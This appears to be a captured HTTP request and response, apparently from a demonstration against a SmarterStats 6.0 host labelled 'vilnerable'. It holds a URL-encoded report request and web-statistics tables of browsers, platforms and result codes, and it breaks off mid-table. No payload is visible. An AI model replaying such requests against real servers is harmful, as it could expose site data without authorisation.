Hw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAIHDw8WEB8HBgDA%2BAxcNc0IHwgGAEDK%2BKPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fBgUTMjAxMC0xMC0wOS0wMC0wMC0wMB8QBQdyaUxhYmVsHxFoHwpoHwgGAEDK%2BKPo4AdkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhoFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%2BKPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAILDxYCHwNoZAINDxYCHwNoZAIPDxYCHwNoZAIRDxYCHwNoZAITDxYCHwNoZAIXDxYCHwNoZAIZDxYCHwNoFgICAQ8QZGQWAGQCGw8WAh8DaGQCHQ8WAh8DaGQCHw8WAh8DaGQCIQ8PFgIfBgUKR2V0IFJlcG9ydGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBRZjdGwwMCRNUEgkUmFkU3RhcnREYXRlBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBRRjdGwwMCRNUEgkUmFkRW5kRGF0ZQUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXIFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFyvU7iaHYBbKQeGtHw6kNdeUAPWDYACUzT5UpfA6p01Wc%3D&ctl00%24MPH%24RadStartDate=2010-10-03&ctl00_MPH_RadStartDate_dateInput_text=10%2F3%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-03-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadStartDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-09&ctl00_MPH_RadEndDate_dateInput_text=10%2F9%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-09-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24hfDMFilename=&ctl00%24MPH%24hfDMReport=&ctl00_MPH_mnuTable_rowCount_10_CB=on&__ASYNCPOST=true&

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:14:41 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 44336

1|#||4|625|updatePanel|ctl00_BPH_UpdatePanel2|
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |312|updatePanel|ctl00_MPH_UpdatePanel1|
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               |37083|updatePanel|ctl00_MPH_UP1|
           <div class="Report"><div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Browsers</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="Browsers"> <div class='ReportChart'><img src="/Temp/a1713db43e9e47dd914134f0f3e27189.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Browser</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Firefox</td>

<td class='ar percentcol '>
<div class='percent percent5'></div>
797</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
537</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
11,857</td>
<td class='ar percentcol rc'>
<div class='percent percent9'></div>
96</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>IE</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
3,743</td>
<td class='ar percentcol '>
<div class='percent percent7'></div>
151</td>
<td class='ar percentcol '>
<div class='percent percent15'></div>
7,291</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
264</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
46</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
57</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
30</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
107</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
104</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Safari</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
23</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
14</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
576</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
4</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Google Chrome</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
354</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Opera</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
11</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
160</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Netscape</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>PlayStation Portable</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>4,768</td>
<td class='FooterTotal ar percentcol'>820</td>
<td class='FooterTotal ar percentcol'>20,539</td>
<td class='FooterTotal ar rc percentcolrc'>373</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>476</td>
<td class='FooterAverages ar percentcol'>82</td>
<td class='FooterAverages ar percentcol'>2,053</td>
<td class='FooterAverages ar rc percentcolrc'>37</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Browser Versions</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="BrowserVersions"> <div class='ReportChart'><img src="/Temp/a443c3433e3c481fa60ed20e09e0396a.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Browser</th><th class='al '>Version</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Firefox</td>

<td class='al '>3.6</td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
606</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
407</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
10,080</td>
<td class='ar percentcol rc'>
<div class='percent percent9'></div>
82</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Firefox</td>

<td class='al '>3</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
99</td>
<td class='ar percentcol '>
<div class='percent percent4'></div>
73</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
571</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>IE</td>

<td class='al '>6</td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
332</td>
<td class='ar percentcol '>
<div class='percent percent4'></div>
67</td>
<td class='ar percentcol '>
<div class='percent percent4'></div>
1,588</td>
<td class='ar percentcol rc'>
<div class='percent percent1'></div>
16</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>IE</td>

<td class='al '>8</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
62</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
51</td>
<td class='ar percentcol '>
<div class='percent percent5'></div>
1,966</td>
<td class='ar percentcol rc'>
<div class='percent percent1'></div>
15</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>Bots, Spiders</td>

<td class='al '></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
30</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
107</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Unknown</td>

<td class='al '></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
46</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
57</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Firefox</td>

<td class='al '>3.5</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
62</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
29</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
840</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
8</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Firefox</td>

<td class='al '>4</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
28</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
26</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
364</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>IE</td>

<td class='al '>7</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
3,347</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent9'></div>
3,717</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
232</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='al '></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
104</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (13)</td>
<td class='FooterTotal al '>&nbsp;</td>
<td class='FooterTotal ar percentcol'>56</td>
<td class='FooterTotal ar percentcol'>47</td>
<td class='FooterTotal ar percentcol'>1,145</td>
<td class='FooterTotal ar rc percentcolrc'>9</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal al '>&nbsp;</td>
<td class='FooterTotal ar percentcol'>4,768</td>
<td class='FooterTotal ar percentcol'>820</td>
<td class='FooterTotal ar percentcol'>20,539</td>
<td class='FooterTotal ar rc percentcolrc'>373</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages al '>&nbsp;</td>
<td class='FooterAverages ar percentcol'>207</td>
<td class='FooterAverages ar percentcol'>35</td>
<td class='FooterAverages ar percentcol'>893</td>
<td class='FooterAverages ar rc percentcolrc'>16</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Platforms</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="Platforms"> <div class='ReportChart'><img src="/Temp/62a611a443bc4f55b5bd9e8fcf1d4d70.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Platform</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Win XP</td>

<td class='ar percentcol '>
<div class='percent percent6'></div>
830</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
396</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
9,573</td>
<td class='ar percentcol rc'>
<div class='percent percent8'></div>
77</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Win 7 / 2008 R2</td>

<td class='ar percentcol '>
<div class='percent percent1'></div>
214</td>
<td class='ar percentcol '>
<div class='percent percent10'></div>
161</td>
<td class='ar percentcol '>
<div class='percent percent11'></div>
4,311</td>
<td class='ar percentcol rc'>
<div class='percent percent3'></div>
35</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Win Vista / 2008</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
3,443</td>
<td class='ar percentcol '>
<div class='percent percent6'></div>
103</td>
<td class='ar percentcol '>
<div class='percent percent13'></div>
5,151</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
244</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
30</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
107</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
45</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
42</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
124</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Win 2000</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
16</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
86</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
104</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Linux</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
44</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
14</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
315</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
4</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Android 2.1</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
12</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
7</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
367</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>iPhone OS 4</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
132</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (8)</td>
<td class='FooterTotal ar percentcol'>37</td>
<td class='FooterTotal ar percentcol'>18</td>
<td class='FooterTotal ar percentcol'>269</td>
<td class='FooterTotal ar rc percentcolrc'>3</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>4,768</td>
<td class='FooterTotal ar percentcol'>820</td>
<td class='FooterTotal ar percentcol'>20,539</td>
<td class='FooterTotal ar rc percentcolrc'>373</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>264</td>
<td class='FooterAverages ar percentcol'>45</td>
<td class='FooterAverages ar percentcol'>1,141</td>
<td class='FooterAverages ar rc percentcolrc'>21</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Result Codes</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="ResultCodes"> <div class='ReportChart'><img src="/Temp/e16b789c86b7422894a28b9231fbfe31.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Result Code</th><th class='ar rc'>Hits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>200 - OK</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
19,653</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>404 - Not Found</td>

<td class='ar percentcol rc'>
<div class='percent percent6'></div>
4,771</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>400 - Bad Request</td>

<td class='ar percentcol rc'>
<div class='percent percent2'></div>
1,945</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>304 - Not Modified</td>

<td class='ar percentcol rc'>
<div class='percent percent1'></div>
884</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>500 - Internal Server Error</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
711</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>403 - Forbidden</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
182</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>405 - Method Not Allowed</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
81</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>301 - Moved Permanently</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>28,229</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>3,528</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">404 - Page Not Found</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="ResultCodes_404"> <div class='ReportChart'><img src="/Temp/2c3f186c97414f658527d91815802306.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>File</th><th class='ar rc'>Hits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fnull.htw','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>null.htw</a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
198</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcontent%2ffastdial.html','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>content<wbr /><span class='slash'>/</span>fastdial.html</a></td>

<td class='ar percentcol rc'>
<div class='percent percent14'></div>
111</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fWebResource.axd','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>WebResource.axd</a></td>

<td class='ar percentcol rc'>
<div class='percent percent13'></div>
105</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fLogin.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>Login.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent7'></div>
57</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fforum%2findex.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>forum<wbr /><span class='slash'>/</span>index.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent5'></div>
42</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

